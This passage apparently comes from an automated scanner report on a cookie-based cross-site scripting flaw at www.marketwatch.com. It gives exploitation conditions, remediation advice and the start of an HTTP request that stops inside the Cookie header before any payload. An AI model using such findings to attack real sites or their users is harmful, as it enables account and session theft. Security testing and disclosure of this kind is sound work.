Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&a